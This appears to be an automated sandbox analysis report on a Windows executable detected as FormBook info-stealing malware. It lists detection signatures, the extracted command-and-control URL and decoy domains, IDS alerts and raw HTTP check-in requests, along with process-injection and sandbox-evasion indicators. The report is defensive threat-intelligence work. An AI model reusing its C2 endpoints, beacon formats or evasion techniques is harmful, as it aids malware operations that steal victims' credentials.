Analysis Report NEW ORDER SOR 10531220.exe

Overview

General Information

Sample Name: NEW ORDER SOR 10531220.exe
Analysis ID: 411847
MD5: 2e2de2014ccb06fea1b50414f5e301e6
SHA1: b571217f877106966f056526c0fdb0068ebfcbff
SHA256: f8ca257b6bbb8a0b617611a8ddb0068f056f3dc38eb525495978632b03964380
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: www.magnumopuspro.com/nyr/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.magnumopuspro.com/nyr/"], "decoy": ["anemone-vintage.com", "ironcitytools.com", "joshandmatthew.com", "breathtakingscenery.photos", "karabakh-terror.com", "micahelgall.com", "entretiendesterrasses.com", "mhgholdings.com", "blewm.com", "sidewalknotary.com", "ytrs-elec.com", "danhpham.com", "ma21cle2henz.xyz", "lotusforlease.com", "shipleyphotoandfilm.com", "bulktool.xyz", "ouedzmala.com", "yichengvpr.com", "connectmygames.com", "chjcsc.com", "dope-chocolate.com", "tacowench.com", "projectsbay.com", "xn--pgboc92d.com", "royaldropofoil.com", "ranguanglian.club", "mobilne-kucice.com", "buytsycon.com", "goiasbets.net", "blpetroleum.com", "starrealms.net", "exclusiveflooringcollection.com", "kudalive.com", "tienda-sky.com", "drillinginsider.info", "theglasshousenyc.com", "vietnammoi.xyz", "walterbenicio.com", "zoomtvliveshows.xyz", "boujiehoodbaby.com", "yzyangyu.com", "exploreecetera.com", "sycord.com", "waykifood.com", "shadingconsultancy.com", "precedentai.net", "linhanhkitchen.com", "expekt24.com", "socialdating24.com", "lubvim.com", "floryi.com", "alerist.com", "maluss.com", "hitbbq.com", "alerrandrotattoo.com", "algoplayer.com", "idahooutsiders.com", "qygmuakhk.club", "neverpossible.com", "winparadigm.com", "toughdecorative.com", "yourbuildmedia.com", "summercrowd.com", "josemvazquez.com"]}
Multi AV Scanner detection for domain / URL
Source: www.magnumopuspro.com/nyr/ Virustotal: Detection: 5%
Multi AV Scanner detection for submitted file
Source: NEW ORDER SOR 10531220.exe Virustotal: Detection: 60%
Source: NEW ORDER SOR 10531220.exe Metadefender: Detection: 20%
Source: NEW ORDER SOR 10531220.exe ReversingLabs: Detection: 51%
Yara detected FormBook
Source: Yara match File source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: NEW ORDER SOR 10531220.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: NEW ORDER SOR 10531220.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: NEW ORDER SOR 10531220.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netsh.pdb source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310618621.0000000002E50000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306018733.00000000010C0000.00000040.00000001.sdmp, netsh.exe, 0000000F.00000002.504469970.0000000000D20000.00000040.00000001.sdmp
Source: Binary string: netsh.pdbGCTL source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310618621.0000000002E50000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306018733.00000000010C0000.00000040.00000001.sdmp, netsh.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 4x nop then pop esi 3_2_004172F1
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 4x nop then pop edi 3_2_0040E429
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop esi 15_2_001872F1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 15_2_0017E429

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 172.255.115.89:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 172.255.115.89:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 172.255.115.89:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.magnumopuspro.com/nyr/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /nyr/?hRXX=pvzb7SsULo7Y2vRo6lGAqy8tja7/7li767PDw0IqJEj7KBKEBSl8rkLevIquA9l06aH5&VBZDH=6l68xBo0LhJD2lv HTTP/1.1Host: www.chjcsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nyr/?VBZDH=6l68xBo0LhJD2lv&hRXX=17hAXKnq4LEoTdb/hcwwVfWjS4IYRgMdOmXX52SprwB/nueYqi9a5dgIoxBN3QmuetP3 HTTP/1.1Host: www.theglasshousenyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
Source: global traffic HTTP traffic detected: GET /nyr/?hRXX=pvzb7SsULo7Y2vRo6lGAqy8tja7/7li767PDw0IqJEj7KBKEBSl8rkLevIquA9l06aH5&VBZDH=6l68xBo0LhJD2lv HTTP/1.1Host: www.chjcsc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nyr/?VBZDH=6l68xBo0LhJD2lv&hRXX=17hAXKnq4LEoTdb/hcwwVfWjS4IYRgMdOmXX52SprwB/nueYqi9a5dgIoxBN3QmuetP3 HTTP/1.1Host: www.theglasshousenyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.socialdating24.com
Source: NEW ORDER SOR 10531220.exe String found in binary or memory: Http://google.com.br
Source: NEW ORDER SOR 10531220.exe String found in binary or memory: Http://google.com.bre45766964656E6365557067726164654C6F636B486F6C646572%4A6535325178727349
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244487250.0000000002EE1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.274441918.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244063778.0000000001318000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: NEW ORDER SOR 10531220.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00419D60 NtCreateFile, 3_2_00419D60
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00419E10 NtReadFile, 3_2_00419E10
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00419E90 NtClose, 3_2_00419E90
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00419F40 NtAllocateVirtualMemory, 3_2_00419F40
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00419D5A NtCreateFile, 3_2_00419D5A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89840 NtDelayExecution,LdrInitializeThunk, 15_2_00D89840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_00D89860
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D895D0 NtClose,LdrInitializeThunk, 15_2_00D895D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D899A0 NtCreateSection,LdrInitializeThunk, 15_2_00D899A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89540 NtReadFile,LdrInitializeThunk, 15_2_00D89540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_00D89910
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D896D0 NtCreateKey,LdrInitializeThunk, 15_2_00D896D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D896E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_00D896E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89A50 NtCreateFile,LdrInitializeThunk, 15_2_00D89A50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89FE0 NtCreateMutant,LdrInitializeThunk, 15_2_00D89FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89780 NtMapViewOfSection,LdrInitializeThunk, 15_2_00D89780
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89710 NtQueryInformationToken,LdrInitializeThunk, 15_2_00D89710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D898F0 NtReadVirtualMemory, 15_2_00D898F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D898A0 NtWriteVirtualMemory, 15_2_00D898A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D8B040 NtSuspendThread, 15_2_00D8B040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89820 NtEnumerateKey, 15_2_00D89820
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D899D0 NtCreateProcessEx, 15_2_00D899D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D895F0 NtQueryInformationFile, 15_2_00D895F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89950 NtQueueApcThread, 15_2_00D89950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89560 NtWriteFile, 15_2_00D89560
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D8AD30 NtSetContextThread, 15_2_00D8AD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89520 NtWaitForSingleObject, 15_2_00D89520
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89A80 NtOpenDirectoryObject, 15_2_00D89A80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89650 NtQueryValueKey, 15_2_00D89650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89670 NtQueryInformationProcess, 15_2_00D89670
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89660 NtAllocateVirtualMemory, 15_2_00D89660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89610 NtEnumerateValueKey, 15_2_00D89610
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89A10 NtQuerySection, 15_2_00D89A10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89A00 NtProtectVirtualMemory, 15_2_00D89A00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89A20 NtResumeThread, 15_2_00D89A20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D8A3B0 NtGetContextThread, 15_2_00D8A3B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D897A0 NtUnmapViewOfSection, 15_2_00D897A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89770 NtSetInformationFile, 15_2_00D89770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D8A770 NtOpenThread, 15_2_00D8A770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89760 NtOpenProcess, 15_2_00D89760
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D8A710 NtOpenProcessToken, 15_2_00D8A710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89B00 NtSetValueKey, 15_2_00D89B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D89730 NtQueryVirtualMemory, 15_2_00D89730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00189D60 NtCreateFile, 15_2_00189D60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00189E10 NtReadFile, 15_2_00189E10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00189E90 NtClose, 15_2_00189E90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00189D5A NtCreateFile, 15_2_00189D5A
Detected potential crypto function
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 0_2_0130C2B0 0_2_0130C2B0
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 0_2_01309990 0_2_01309990
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 0_2_0130FCB0 0_2_0130FCB0
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 0_2_0130FCC0 0_2_0130FCC0
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041E853 3_2_0041E853
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041D07C 3_2_0041D07C
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041E00E 3_2_0041E00E
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041EA8B 3_2_0041EA8B
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00402D87 3_2_00402D87
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00409E40 3_2_00409E40
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00409E3C 3_2_00409E3C
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5B090 15_2_00D5B090
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E120A8 15_2_00E120A8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D720A0 15_2_00D720A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5841F 15_2_00D5841F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E01002 15_2_00E01002
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5D5E0 15_2_00D5D5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D72581 15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E11D55 15_2_00E11D55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4F900 15_2_00D4F900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E12D07 15_2_00E12D07
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D40D20 15_2_00D40D20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D64120 15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E12EF7 15_2_00E12EF7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E122AE 15_2_00E122AE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D66E30 15_2_00D66E30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E11FF1 15_2_00E11FF1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E0DBD2 15_2_00E0DBD2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7EBB0 15_2_00D7EBB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E12B28 15_2_00E12B28
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0018E00E 15_2_0018E00E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0018D07C 15_2_0018D07C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00172D90 15_2_00172D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00172D87 15_2_00172D87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00179E3C 15_2_00179E3C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00179E40 15_2_00179E40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00172FB0 15_2_00172FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00D4B150 appears 35 times
Sample file is different than original file name gathered from version info
Source: NEW ORDER SOR 10531220.exe, 00000000.00000000.233223977.0000000000B56000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameValueTuple.exe8 vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244063778.0000000001318000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.248937726.00000000062F0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244487250.0000000002EE1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000002.00000000.240632368.00000000000F6000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameValueTuple.exe8 vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306240737.000000000136F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000003.00000002.305760685.00000000006B6000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameValueTuple.exe8 vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310682715.0000000002E6C000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetsh.exej% vs NEW ORDER SOR 10531220.exe
Source: NEW ORDER SOR 10531220.exe Binary or memory string: OriginalFilenameValueTuple.exe8 vs NEW ORDER SOR 10531220.exe
Uses 32bit PE files
Source: NEW ORDER SOR 10531220.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
